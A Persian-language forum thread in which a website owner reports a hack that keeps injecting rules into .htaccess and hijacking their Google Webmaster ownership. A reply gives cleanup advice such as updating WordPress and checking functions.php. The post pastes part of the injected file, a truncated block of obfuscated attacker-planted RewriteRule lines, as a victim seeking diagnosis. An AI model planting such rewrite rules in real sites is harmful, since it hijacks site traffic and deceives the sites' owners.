رفتن به مطلب

هک شدن از طریق FTP


پست های پیشنهاد شده

سلام متاسفانه وبسایت من توسط شخصی ناشناس هک شده و فایل مخرب بر روی سرور آپ شده که بصورت خودکار دسترسی فایل  .htaccess  رو تغییر میده و کدهای بسیاری بهش اضافه میشه تا حدی که حجمش میره بالا و سایت با ارور 403 مواجه میشه هکر با آپلود فایل تاییدیه وبمستر بر روی هاست من تونسته تو گوگل وبمستر هم خودش رو مدیر جلوه بده و کلا عاس و پاسمون

کردم 

تمامی رمز ها رو تغییر دادم و فایده ای نداشته 

کسی هست ما رو از این منجلاب در بیاره؟

 


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%(.)F%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%(.)F-%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)(.)%(. )F-%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%(. )(.)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)-%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)(. )%(.)F-%([0-9]+)[0-9]+%(. )(.)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(. )%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+).. $ ?$64$65=$63&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)(. )%(.)F-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%(. )([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)(.)%(. )F%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%(. )(.)%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+..$ ?$47$43=$46&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%(. )[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)(.)%(. )F-%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%(. )F%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)-%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%(. )F%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)-%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%(. )F%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)(.)%(. )[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)..$ ?$56$57=$55&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%(. )(.)-%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%([^\d\/]+)E%([0-9]+)[0-9]+%[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)%([0-9]+)[0-9]+%(.)[0-9]+-%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%(. )F%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+).. $ ?$48$49=$47&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)(. )%(.)F-%([0-9]+)(. )%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)(. )%(.)[0-9]+%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+).. $ ?$43$44=$42&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)(. )%(.)F-%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+-%([0-9]+)[0-9]+%(. )[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%(.)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)([^\d\/]+)%[0-9]+([0-9]+)%([0-9]+)[0-9]+%(. )F..$ ?$31$32=$33&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%(. )F%([0-9]+)[0-9]+%(.*)[0-9]+%([0-9]+)[0

 

لینک به ارسال

سلام

من هم مشکل گوگل وبمستر رو داشتم ، که یه مدیر دیگه تایید شده بود و ایندکس های مخرب آپلود شده بود که با آپدیت کردن وردپرس و حذف افزونه هایی که خیلی وقته آپدیت ندادن براش مشکلم حل شد .

ضمناً فایل functions.php رو هم 100% بررسی کنید چون ممکنه از اون فایل بتونه یوزر جدید داخل وردپرس بسازه .

داخل گوگل وب مستر هم دسترسی رو بگیرید ( کلاً اون یوزر جدید رو پاک کنید ).

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • اضافه کردن...